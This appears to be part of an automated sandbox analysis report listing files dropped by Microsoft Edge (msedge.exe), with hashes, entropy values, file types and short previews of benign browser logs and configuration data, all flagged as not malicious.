                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):342
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.166995829241005
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ihft+q2P923oH+TcwtfrzAdIFUt8dhf5Zmw+dEtVkwO923oH+TcwtfrzILJ:iVov4Yeb9FUt8dV5/+dET5LYeb2J
                                                                                                                                                                                                                                                                                    MD5:B7D72CF617D5C294A26FC41F0438F3D0
                                                                                                                                                                                                                                                                                    SHA1:F0D9C42CFB370EBD21EB08B7FEAFD308391DA582
                                                                                                                                                                                                                                                                                    SHA-256:9477F6B1ED09D1FBDD977589080EF1486DC951C4E935FD1BD8936C9133D9683B
                                                                                                                                                                                                                                                                                    SHA-512:EA8EB3429B028B6C216DE66C25EE246DC419A3E60FFDD02422EFAB6CC4F5BDA33D3CBDD320B45AB511DFAA16D78A32051FD6640067B66AF0493B6EB5E5DAD0CB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:12.400 1788 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-08:47:12.400 1788 Recovering log #3.2024/12/27-08:47:12.401 1788 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):120
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                    MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                    SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                    SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                    SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):13
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                    MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                    SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                    SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                    SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44137
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.090762801856725
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMcwuF9hDO6vP6O+9tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynE264tbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:0334AF84CB7F9431110C043D7C82B9A4
                                                                                                                                                                                                                                                                                    SHA1:82CB7B6734F8B707C22BF31B051DE1FA542C350D
                                                                                                                                                                                                                                                                                    SHA-256:739A762981ED5C3A6D30B82651E7BA1E4AC85556324F3C12B2A0B06D07DEB1F9
                                                                                                                                                                                                                                                                                    SHA-512:C72ECD5743F425422719144A7B67D8D3FA839B4FA93C2DE74A8EC8CE68F1790873F1DF5A978E6453D9FD2BA2EBEA40045163A280D61CC05CBB4FFA07DAC95727
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                    MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                    SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                    SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                    SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):47
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                    MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                    SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                    SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                    SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):35
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                    MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                    SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                    SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                    SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):81
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                    MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                    SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                    SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                    SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):130439
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                    MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                    SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                    SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                    SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                    MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                    SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                    SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                    SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):57
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                    MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                    SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                    SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                    SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):29
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                    MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                    SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                    SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                    SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):575056
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                    MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                    SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                    SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                    SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):460992
                                                                                                                                                                                                                                                                                    Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                                                    SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                    MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                    SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                    SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                    SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                    MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                    SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                    SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                    SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:uriCache_
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):179
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.022430934740917
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclQxVW0k:YWLSGTt1o9LuLgfGBPAzkVj/T8lQTw
                                                                                                                                                                                                                                                                                    MD5:EA08B33C7C39C36ADB5FA4B5DD1A57F7
                                                                                                                                                                                                                                                                                    SHA1:C5CF40D88FA6A0C9BF0631114A22FD6D5F4B306D
                                                                                                                                                                                                                                                                                    SHA-256:B75BA944257AFD760C1F18A9C5F87EEA92EB1684184D464D6BECE0CD144B7694
                                                                                                                                                                                                                                                                                    SHA-512:1EE54803312A06314EA3568DB81AB3AC76E66B766C69AC52FBE4B96F7A88AF31B354E831D01E525D4BEA9E80FD59A10D138B7753BBCA30E6AE2896CF38A03702
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1735408037139528}]}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
                                                                                                                                                                                                                                                                                    MD5:16B7586B9EBA5296EA04B791FC3D675E
                                                                                                                                                                                                                                                                                    SHA1:8890767DD7EB4D1BEAB829324BA8B9599051F0B0
                                                                                                                                                                                                                                                                                    SHA-256:474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
                                                                                                                                                                                                                                                                                    SHA-512:58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):44690
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.095609369045188
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBVwufhDO6vP6O2cwAI16Lrf6YPAIfcGoup1Xl3jVu:z/Ps+wsI7yOEw6W6chu3VlXr4CRo1
                                                                                                                                                                                                                                                                                    MD5:F20F9CF8482E41020FF0C257736BD589
                                                                                                                                                                                                                                                                                    SHA1:AD0EEB9DBB9C6A5C6622E1C7410E9CDEE7C4581A
                                                                                                                                                                                                                                                                                    SHA-256:B9D5D1A48ACC352B51A58DA4A1A7C387CF68C27ED9A532807A883BA99E5A7FAD
                                                                                                                                                                                                                                                                                    SHA-512:FD74DACD812B8206BFC375F4F549492D391039F27B1B2FE60F501924C0777F8804B1376BBE931FCD0A130B2D77CF43B4D7A6F2ECF419D6091246DEFBDE1592D2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):45839
                                                                                                                                                                                                                                                                                    Entropy (8bit):6.088043362930273
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:WMkbJrT8IeQc5d9IxKushDO6vP6O2cwAI16Lrf6YPAIf9N2aPiCAoYGoup1Xl3jn:WMk1rT8H19Ix6W698aPiRoYhu3VlXr4y
                                                                                                                                                                                                                                                                                    MD5:584447B3DFE0FE10846E85FCC52EBC52
                                                                                                                                                                                                                                                                                    SHA1:E657BEE187DD8BAB518DA9F5080068FC7AF68200
                                                                                                                                                                                                                                                                                    SHA-256:7523F746D2174066F8C127DCA5ECDF1721783FFCB6666AAE8A383A1BA152E112
